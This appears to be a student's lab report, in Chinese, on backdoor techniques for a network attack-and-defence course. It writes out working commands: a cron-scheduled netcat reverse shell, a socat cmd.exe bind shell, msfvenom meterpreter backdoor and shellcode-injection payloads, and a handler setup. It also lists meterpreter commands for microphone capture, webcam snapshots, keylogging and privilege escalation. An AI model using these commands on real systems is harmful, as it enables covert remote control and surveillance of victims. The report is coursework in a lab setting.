• # 20192407 202120222 《网络与系统攻防技术》实验二实验报告


    1.实验内容

    (1)使用netcat获取主机操作Shell,cron启动定时任务

    (2)使用socat获取主机操作Shell, 任务计划启动

    (3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

    (4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

    (5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

    2.实验过程

    (1)使用netcat获取主机操作Shell,cron启动定时任务
    首先获取主机的ip地址:

    接着windows打开监听:

    在kali中使用cron指令:输入 crontab -e 并在最后一行添加 * * * * * /bin/netcat 192.168.1.160 8888 -e /bin/sh,让kali每分钟都执行一次指令,并可以用crontab -l指令查看:

    windows获得kali的shell:

    (2)使用socat获取主机操作Shell, 任务计划启动
    创建计划程序,设置名称,触发器,选择执行程序并在添加层数处输入指令tcp-listen:8888 exec:cmd.exe,pty,stderr把cmd.exe绑定到端口8888。



    到达指定时间后点击运行Windows会出现弹窗,在kali上启动监听,以连接上windows的shell

    (3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
    在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.41.132 LPORT=8880 -f exe > meter_backdoor.exe生成后门程序“meter_backdoor.exe”。

    在Windows下执行ncat.exe -l 8888 > meter_backdoor.exe,这样被控主机就进入了接收文件模式,在kali中执行nc 192.168.0.100 5121 < meter_backdoor.exe

    windows成功接受了kali的exe文件

    在kali上使用msfconsole指令进入msf控制台

    输入use exploit/multi/handler使用监听模块,设置payload

    set payload windows/meterpreter/reverse_tcp

    set LHOST 192.168.41.132,这里用的是Kali的IP

    set LPORT 8888,同样要使用相同的端口
    设置完成之后,输入指令exploit执行监听,并运行Windows下的后门程序,此时kali上已经获得了Windows主机的连接,并且得到了远程控制的shell

    (4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
    使用record_mic指令可以截获一段音频
    使用webcam_snap指令可以使用摄像头进行拍照
    使用screenshot指令可以进行截屏
    使用keyscan_start指令记录下击键的过程,使用keyscan_dump指令读取击键记录
    使用getuid指令查看当前用户,使用getsystem指令进行提权操作

    (5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
    获得主机shell:msfvenom -p linux/x86/reverse_tcp LHOST=192.168.41.132 LPORT=8888 -x ./pwn20192407 -f elf >20192407xjypwnshellcode
    并监听

    3.问题及解决方案

    • 问题1:windows无法运行 ncat.exe
    • 问题1解决方案:将其换为兼容win7模式即可 。
    • 问题2:监听时无法产生音频
    • 问题2解决方案:电脑录音权限未打开,打开即可。
    • 问题3:打开文件权限不足
    • 问题3解决方案:使用chmod u+x *命令提权。

      回答问题:
      (1)例举你能想到的一个后门进入到你系统中的可能方式?
      qq,微信的一些可疑链接
      (2)例举你知道的后门如何启动起来(win及linux)的方式?
      通过驱动程序启动
      (3)Meterpreter有哪些给你映像深刻的功能?
      截获音频,使用摄像头,获得截屏,记录击键等
      (4)如何发现自己有系统有没有被安装后门?
      任务管理器查看有无可疑程序

    4.学习感悟、思考等

    本次实验内容虽然看似不多,但是在实际操作时还是遇到了很多问题,且电脑的一些设置也会对实验造成影响。通过这次实验,我对后门的知识有了进一步的了解,也对网络攻防的手段和预防有了更好的理解。

  • 相关阅读:
    PAT乙级1008. 数组元素循环右移问题 (20)
    PAT乙级1007. 素数对猜想 (20)
    PAT乙级1006. 换个格式输出整数 (15)
    ubuntu mate 开机自动启动ssh服务
    ubuntu 修改网卡名称
    ubuntu 绑定固定ip
    ubuntu sogou 輸入法無法輸入文字,解決辦法【转载】
    select()函数小结【转载】
    listen函数小结
    python学习过程二(《python核心编程》第三章)
  • 原文地址:https://www.cnblogs.com/xingjiyuan/p/16089000.html
Copyright © 2020-2023  润新知